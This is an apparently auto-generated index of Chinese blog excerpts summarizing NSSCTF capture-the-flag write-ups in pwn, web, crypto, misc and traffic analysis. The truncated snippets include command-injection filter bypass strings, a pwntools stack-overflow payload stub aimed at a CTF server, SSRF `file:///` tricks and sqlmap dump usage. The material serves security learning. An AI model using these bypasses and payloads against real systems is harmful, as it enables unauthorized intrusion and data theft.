• 2024-11-17[陇剑杯 2021]ios流量分析
    [陇剑杯2021]ios(问1)一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答:黑客所控制的C&C服务器IP是********_。得到的flag请使用NSSCTF{}格式提交。首先过滤http的流量,这边依次点击,进行排查黑客上传了那些文件后面发现
  • 2024-10-08NSSCTF(PWN)10
    [HUBUCTF2022新生赛]singout这题是道签到题,直接nc但是catflag得不到flag我们可以用:1catflag2nl${IFS}f*3tacfla*>&24tacf\lag>&25tail./*6tac${IFS}f*7tac$IFS$9f*8tac./*用这些得到flag[LitCTF2023]狠狠的溢出涅~查看发现是64位文件这道
  • 2024-10-08NSSCTF(PWN)9
    [HDCTF2023]pwnner发现这是一个64位文件发现vuln双击进入我们发现第14行涉及栈溢出,且第7行告诉我们这里伪随机数种子是39,第11行这里涉及随机值判断我们运行写好的c语言,得到这个伪随机数发现这题有system和binsh找到他们exp:frompwnimport*context(os='linux',a
  • 2024-09-30NSSCTF(PWN)4
    [GDOUCTF2023]Shellcode使用checksec发现这是64位文件查看main函数发现这题涉及到了栈溢出我们点开第一个read,name发现位于bss段中,就想到这里涉及到了shellcode,但是使用 shellcraft默认生成的字节数是44字节,这里最大输入数才25字节,所有不能使用默认生成这里我们就
  • 2024-09-29NSSCTF(PWN)3
    [HGAME2023week1]test_nc这是一道简单的nc签到题,直接终端nc就行[NISACTF2022]ezpie使用checksec,发现这题是32位且开了PIE进入main函数,我们要打印一个Input,发现了vuln双击进入这里涉及了严重的栈溢出因为这道题涉及PIE我们要找到main和shell的偏移量经过计算s
  • 2024-09-25nssctf(web
    web1.浏览器也能套娃查看wp,是ssrf漏洞介绍:SSRF漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。SSRF的利用:进行内网资源的访问:url?url=http://内网的资源url利用伪协议:file:///这种
  • 2024-08-14NSSCTF WEB nizhuansiwei
    进入题目页面,先看一眼标签,发现本题的标签是反序列化,php伪协议。这些标签是做过题的人共同选出来的,所以具有一定参考价值进入到题目地址,发现是一段php源码,源码都给了,那当然是先来一手代码审计。<?php$text=$_GET["text"];$file=$_GET["file"];$password=$_GET["pas
  • 2024-08-06NSSCTF靶场题解(6)
    站在小白的视角上,写了在写题目的wp方面更多是想体现题目思考的逻辑和细节,更多是写给同样新手小白的内容,解题方面为什么从这一步到下一步的,很助于培养思考题目的逻辑思维,尽我所能把细节阐释到位,有些地方可能理解说辞不是特别到位,如果有问题就麻烦各位大佬师傅指点~这次题解库收
  • 2024-07-30NSSCTF web入门题鉴赏
    前言思来想去还是觉得web好玩一点哈哈,尝试过crypto更能懂那种痛楚[SWPUCTF2021新生赛]Do_you_know_httphttps://www.nssctf.cn/problem/385这道题就是简单的http协议刚开始是'WLLM'browser!这个题眼,于是我们上网络查询一下,发现useragency并不是它,那就需要我们去改一下us
  • 2024-07-23NSSCTF-2021年SWPU联合新生赛
    [SWPUCTF2021新生赛]finalrce这道题目考察tee命令和转义符\这题主要是,遇到一种新的符号,"\"—转义符。我理解的作用就是在一些控制字符被过滤的时候,可以用转义符,让控制符失去原本的含义,变为字面量,但是作用不变。目录扫描得到1.txt文件,但是发现里面没有内容,利用tee命令可以
  • 2024-07-21NSSCTF———Web(sql注入)
    [LitCTF2023]这是什么?SQL!注一下![SWPUCTF2022新生赛]ez_sql[GXYCTF2019]BabySqli                                     点击右下角文章可跳转[LitCTF2023]这是什么?SQL!注一下!首先我们打开
  • 2024-06-22nssctf (2)
    misc*1.转为十六进制编码先是放入winhex,没有发现什么。然后属性也没有。就放入binwalk分离得到一个文档 S1ADBBQAAQAAADkwl0xs4x98WgAAAE4AAAAEAAAAY29kZePegfAPrkdnhMG2gb86/AHHpS0GMqCrR9s21bP43SqmesL+oQGo50ljz4zIctqxIsTHV25+1mTE7vFc9gl5IUif7f1/rHIpHql7nqKPb+2M
  • 2024-06-19NSSCTF ID:389
    我开始入门pwn了,可能有些地方讲的不是很清楚,如果有讲错的地方,各位大佬一定要指点指点我。下载完后打开附件发现是python代码,blacklist是黑名单,所以这里我们要想办法绕过这个黑名单这里我通过l\s绕过了ls的检测,后面也打算这样绕过但这里好像还是被检查到了,自己看了一
  • 2024-06-13nssctf
    crypto1.UUencode不知道是什么解码,用随波逐流看看 还是不知道仔细看看,突然想起他是哪个编码了,UUencode 2栅栏  猜了很多 最后猜了网站的名字,嘿嘿出来了 3.社会主义 很简单的社会主义核心价值解码 4.bubble密码 是ook吧uunbase64  这就没见
  • 2024-06-09NSSCTF-Web题目6
    目录[NISACTF2022]checkin1、题目2、知识点3、思路[NISACTF2022]babyupload1、题目2、知识点3、思路[SWPUCTF2022新生赛]1z_unserialize1、题目2、知识点3、思路[NISACTF2022]checkin1、题目2、知识点010编辑器的使用、url编码3、思路打开题目,得到源
  • 2024-06-08NSSCTF———MISC
    [NISACTF2022]huaji?[SWPU2020]套娃[LitCTF2023]What_1s_BASE(初级)[SWPUCTF2021新生赛]gif好像有点大[NISACTF2022]为什么我什么都看不见[LitCTF2023]404notfound(初级)[LitCTF2023]这羽毛球怎么只有一半啊(恼(初级)[LitCTF2023]喜欢我的压缩包么(初级)[HDCTF
  • 2024-06-07NSSCTF——crypto
    [鹤城杯2021]easy_crypto[强网拟态2021]拟态签到题[SWPUCTF2021新生赛]crypto8[SWPUCTF2021新生赛]crypto7[SWPUCTF2021新生赛]crypto6[SWPUCTF2021新生赛]ez_caesar[SWPUCTF2021新生赛]cr
  • 2024-05-15NSSCTF round#22逆向
    NSSCTFround#22逆向1.wp要及时写不然忘光光2.赛题分文件夹放ezcrypt下载下来是python打包的exe,解包出pyc用pycdc反编译看一下嗯不认识BEFORE_WITH命令。丢到gpt4o里看看还蛮准确的,和作者提供的源码一样。不过对填充的处理不对,原程序是填充'\x00'。不过比自己硬看好太多
  • 2024-05-02NSSCTF流量分析
    1.[BSidesSF-CTF2019]Zippync-l-p4445>flag.zipunzip-Psupercomplexpasswordflag.zipArchive:flag.zipinflating:flag.txtPK.... ...NdbN..,.%...........flag.txtUT ....z\..z\ux...............(.y..z....F.......:...#Bz..:
  • 2024-04-122024 NSSCTF 做题记录
    web[SWPUCTF2021新生赛]easy_sql我可能不知道怎么写参数,但是我会用sqlmap.python3sqlmap.py-u....--dumptestdb另外说一句,直接用--dump-all是很蠢的行为因为可能会dump到mysql的配置数据库,显然对拿到flag没什么帮助。trytouse--dbs.[SWPUCTF2021新生
  • 2024-03-28关于RCE的学习(2)nssctf部分题目实操(1)
           结果对一些基础命令的学习,我发现一个非常显而易见的问题,那就是,理论知识如果没有建立在实操的基础上来讲的话,那么理论知识就会显得非常空,那么结合我上一篇对rce学习的文章,我对一下题目做出如下总结。       首先是,[SWPUCTF2021新生赛]easyrce   
  • 2024-03-21NSSCTF—Crypyo "第一页" ԅ(≖‿≖ԅ) (待续……)
    [鹤城杯2021]easy_crypto题目:公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业
  • 2024-03-16NSSCTF_pwn_notepage(1)
    NSSCTF_pwn_刷题笔记page(1)[SWPUCTF2021新生赛]gift_pwnfrompwnimport*io=remote('node4.anna.nssctf.cn',28991)padding=16+8shell=0x4005B6payload=b'A'*padding+p64(shell)io.sendline(payload)io.interactive()[SWPUCTF2021新生赛]
  • 2024-01-13NSSCTF Round#16 Basic WriteUp
    NSSCTFRound#16Basicwp目录NSSCTFRound#16Basicwp一.pwn1.nc_pwnre2.ret_text一.pwn1.nc_pwnrenc连接得到题目,给了一段汇编代码以及40个十六进制数字分析代码可知,将一个字符串与10h即16进行异或运算,二次异或运算得到字符串TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ
  • 2023-12-29CTF-日志分析
    前言平台:https://www.nssctf.cn/[陇剑杯2021]日志分析(问1)点击查看题目描述题目描述:单位某应用程序被攻击,请分析日志,进行作答:网络存在源码泄漏,源码文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)。得到的flag请使用NSSCTF{}格式提交。搜索常见的文件名